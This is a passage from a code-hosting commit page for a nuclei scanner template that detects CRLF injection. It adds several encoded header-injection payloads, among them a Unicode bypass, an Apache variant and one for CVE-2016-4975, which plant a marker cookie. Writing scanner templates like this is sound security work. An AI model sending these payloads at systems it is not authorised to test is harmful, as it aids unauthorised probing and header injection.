daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update crlf-injection.yaml

patch-1
Mohamed Elbadry 2020-07-06 16:11:29 +02:00 committed by GitHub
parent 8ef6e99ab3
commit e255561721
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
vulnerabilities/crlf-injection.yaml
View File

@ -2,14 +2,20 @@ id: crlf-injection
info:
name: CRLF injection
author: nadino
author: melbadry9 & nadino
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # Unicode bypass
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" #unicode bypass
- "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." #Apache
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" #CVE-2016-4975
matchers:
- type: regex
regex: